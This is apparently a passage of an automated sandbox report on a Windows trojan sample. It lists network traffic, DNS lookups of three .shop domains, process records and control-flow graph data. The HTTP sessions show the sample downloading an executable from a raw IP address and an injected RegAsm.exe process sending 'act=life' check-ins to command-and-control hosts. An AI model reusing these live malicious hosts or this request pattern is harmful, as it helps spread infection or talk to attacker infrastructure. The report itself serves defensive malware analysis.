Aug 28, 2024 15:29:03.098324060 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098453045 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098464012 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098473072 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098484039 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098501921 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098532915 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098536015 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098701954 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098747015 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098861933 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098984957 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099001884 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099034071 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.099037886 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099050045 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099060059 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099081039 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.099106073 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.099252939 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099265099 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.099304914 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100311995 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100370884 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100382090 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100413084 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100474119 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100505114 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100517035 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100522041 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100528002 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100548983 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100593090 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100634098 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100692034 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100703001 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100713015 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100723982 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100734949 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100739956 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100747108 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100769043 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100797892 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100862026 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100873947 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.100922108 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.100997925 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101044893 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101056099 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101092100 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101155996 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101167917 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101177931 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101191044 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101200104 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101227045 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101277113 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101289034 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101300001 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101310015 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101321936 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101347923 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101623058 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101667881 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101667881 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101680040 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101720095 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101856947 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101867914 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101877928 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101890087 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.101901054 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.101928949 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.102010965 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.153951883 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.416830063 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.808367014 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:03.808406115 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:03.808470964 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:03.813328981 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:03.813343048 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:04.443402052 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:04.443507910 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:04.447348118 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:04.447360039 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:04.447597980 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:04.495445013 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:04.495445013 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:04.495559931 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:05.247525930 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:05.247627974 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:05.247704983 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:05.249464035 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Aug 28, 2024 15:29:05.249484062 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Aug 28, 2024 15:29:05.267122030 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.267162085 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:05.267236948 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.269263029 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.269277096 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:05.751277924 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:05.751379967 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.777362108 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.777409077 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:05.777645111 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:05.779382944 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.779403925 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:05.779453039 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.199810982 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.199902058 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.199956894 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.200746059 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.200769901 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.200783968 CEST | 49704 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.200790882 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.493125916 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.493155956 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.493208885 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.493781090 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.493794918 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.967137098 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.967216015 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.969063044 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.969080925 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.969417095 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:06.970669985 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.970694065 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:06.970755100 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.105823994 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.105904102 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.105956078 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.105979919 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.105998993 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.106072903 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.111057043 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.111151934 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.111213923 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.119072914 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.119086981 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.119097948 CEST | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.119102955 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.186758995 CEST | 49707 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.186798096 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.186856031 CEST | 49707 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.187216997 CEST | 49707 | 443 | 192.168.2.7 | 188.114.97.3
Aug 28, 2024 15:29:07.187232018 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.7
Aug 28, 2024 15:29:07.638514996 CEST | 49707 | 443 | 192.168.2.7 | 188.114.97.3
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 28, 2024 15:29:03.784058094 CEST | 57267 | 53 | 192.168.2.7 | 1.1.1.1
          Aug 28, 2024 15:29:03.798139095 CEST | 53 | 57267 | 1.1.1.1 | 192.168.2.7
          Aug 28, 2024 15:29:05.253081083 CEST | 64418 | 53 | 192.168.2.7 | 1.1.1.1
          Aug 28, 2024 15:29:05.265813112 CEST | 53 | 64418 | 1.1.1.1 | 192.168.2.7
          Aug 28, 2024 15:29:06.451728106 CEST | 50347 | 53 | 192.168.2.7 | 1.1.1.1
          Aug 28, 2024 15:29:06.464340925 CEST | 53 | 50347 | 1.1.1.1 | 192.168.2.7
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Aug 28, 2024 15:29:03.784058094 CEST | 192.168.2.7 | 1.1.1.1 | 0x7764 | Standard query (0) | miracledzmnqwui.shop | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:05.253081083 CEST | 192.168.2.7 | 1.1.1.1 | 0xc8f9 | Standard query (0) | locatedblsoqp.shop | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:06.451728106 CEST | 192.168.2.7 | 1.1.1.1 | 0x3ffd | Standard query (0) | traineiwnqo.shop | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Aug 28, 2024 15:29:03.798139095 CEST | 1.1.1.1 | 192.168.2.7 | 0x7764 | No error (0) | miracledzmnqwui.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:03.798139095 CEST | 1.1.1.1 | 192.168.2.7 | 0x7764 | No error (0) | miracledzmnqwui.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:05.265813112 CEST | 1.1.1.1 | 192.168.2.7 | 0xc8f9 | No error (0) | locatedblsoqp.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:05.265813112 CEST | 1.1.1.1 | 192.168.2.7 | 0xc8f9 | No error (0) | locatedblsoqp.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:06.464340925 CEST | 1.1.1.1 | 192.168.2.7 | 0x3ffd | No error (0) | traineiwnqo.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
          Aug 28, 2024 15:29:06.464340925 CEST | 1.1.1.1 | 192.168.2.7 | 0x3ffd | No error (0) | traineiwnqo.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
          • miracledzmnqwui.shop
          • locatedblsoqp.shop
          • traineiwnqo.shop
          • 147.45.44.131
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.7 | 49702 | 147.45.44.131 | 80 | 6612 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 28, 2024 15:29:02.064625025 CEST | 77 | OUT | GET /files/u888.exe HTTP/1.1
          Host: 147.45.44.131
          Connection: Keep-Alive
          Aug 28, 2024 15:29:02.716989040 CEST | 1236 | IN | HTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:02 GMT
          Server: Apache/2.4.52 (Ubuntu)
          Last-Modified: Tue, 27 Aug 2024 16:37:44 GMT
          ETag: "43000-620acdc619d20"
          Accept-Ranges: bytes
          Content-Length: 274432
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdos-program


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.7 | 49703 | 188.114.96.3 | 443 | 320 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-08-28 13:29:04 UTC | 267 | OUT | POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: miracledzmnqwui.shop
          2024-08-28 13:29:04 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-08-28 13:29:05 UTC | 814 | IN | HTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:05 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=3lklc31d910s7hhmnv5u0r03fl; expires=Sun, 22-Dec-2024 07:15:44 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyBUlKY8%2BA0hqBZ78EuF8pdqwEimVCQYowfNNoNS8pUJq%2F1HS8xO1Ze9DZ%2BdXcfHXFM6zeURzAGEYeI3Iaauea7Gw9PzAjtjNjJhrn%2FRcUHHc4jiG67g%2FwleGs2dA0X%2F3mN72HPItA%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8ba4a5ed2eb2c327-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-28 13:29:05 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
          Data Ascii: aerror #D12
          2024-08-28 13:29:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          1 | 192.168.2.7 | 49704 | 188.114.97.3 | 443 | 320 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-08-28 13:29:05 UTC | 265 | OUT | POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: locatedblsoqp.shop
          2024-08-28 13:29:05 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-08-28 13:29:06 UTC | 804 | IN | HTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:06 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=83rdi2afngv8f9dhc7cddk15i1; expires=Sun, 22-Dec-2024 07:15:45 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Li8ZRNaqtKUAd9qJnzDzkR13zIEOx4OlJONFJzfOgMWxKTqqae5rDaPxB5yQ9U78%2FDWOFQwEiHUj7ZmfPimzO6s9AC4k6IYLg1G44nEmjTzIuiNlFh%2Bo7gJ3gWmk%2FDovxz%2F2RrM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8ba4a5f37d7a41ac-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-28 13:29:06 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
          Data Ascii: aerror #D12
          2024-08-28 13:29:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          2 | 192.168.2.7 | 49705 | 188.114.97.3 | 443 | 320 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-08-28 13:29:06 UTC | 263 | OUT | POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: traineiwnqo.shop
          2024-08-28 13:29:06 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-08-28 13:29:07 UTC | 543 | IN | HTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:07 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          X-Frame-Options: SAMEORIGIN
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9AYW3u6A3O2EexhfaxO6u%2BCN3XCToRfG%2FMSYewtXYiP9opGlcRnkhwu2wOseLAJ1z8MK3WJb2wzkbCQn91ukvDnouPgZDGyRLp31LVCk164FWSZT55pJj9xXLFx8Qx3TuBrj"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8ba4a5fb1f078cc0-EWR
          2024-08-28 13:29:07 UTC | 826 | IN | Data Ascii: 1128<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
          2024-08-28 13:29:07 UTC | 1369 | IN | Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
          2024-08-28 13:29:07 UTC | 1369 | IN | Data Ascii: <input type="hidden" name="atok" value="Z8rOOVpCGVmgWNTmDZS3RE039ad5UG9OEliujIvYDKQ-1724851747-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-btn" style="backgrou
          2024-08-28 13:29:07 UTC | 836 | IN | Data Ascii: ll;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
          2024-08-28 13:29:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0



          Target ID: 0
          Start time: 09:29:01
          Start date: 28/08/2024
          Path: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          Wow64 process (32bit): true
          Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
          Imagebase: 0x4c0000
          File size: 14'336 bytes
          MD5 hash: 876C12019E3B15FE92841E8D358D4921
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Reputation: low
          Has exited: true

          Target ID: 2
          Start time: 09:29:02
          Start date: 28/08/2024
          Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit): false
          Commandline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
          Imagebase: 0xa0000
          File size: 65'440 bytes
          MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Reputation: high
          Has exited: true

          Target ID: 3
          Start time: 09:29:02
          Start date: 28/08/2024
          Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit): true
          Commandline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
          Imagebase: 0xaf0000
          File size: 65'440 bytes
          MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Reputation: high
          Has exited: true


            Execution Graph

            Execution Coverage:28.2%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:11.1%
            Total number of Nodes:63
            Total number of Limit Nodes:2

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: <-q
            • API String ID: 0-3445421276
            • Opcode ID: 42848d297370ea74e60b5998f168583cac79f25391276d60f26c61fb1b5a655d
            • Instruction ID: 125c49f1b9b13fcfd9b59c5fff3c5e89a09150642ecb61bc0db0713899d23ead
            • Opcode Fuzzy Hash: 42848d297370ea74e60b5998f168583cac79f25391276d60f26c61fb1b5a655d
            • Instruction Fuzzy Hash: F9128130B002099FDB58DB65D855B6EB7B2BFC8300F24C169E80AAB395DF35DD428B95

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CF3066
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: e1e492a77f97b54ed410dc0b707525e9d9ff7703bbb3ff0a3eb76be711dad655
            • Instruction ID: 611615fa972ddcc322127ec0c842a57dca68b7f2567c61fce8efe8d2a813a789
            • Opcode Fuzzy Hash: e1e492a77f97b54ed410dc0b707525e9d9ff7703bbb3ff0a3eb76be711dad655
            • Instruction Fuzzy Hash: B5A16C71D0075D9FEB64CFA8C841BEDBBB2BF48310F148169E919A7240DB749A85CF92

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CF3066
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
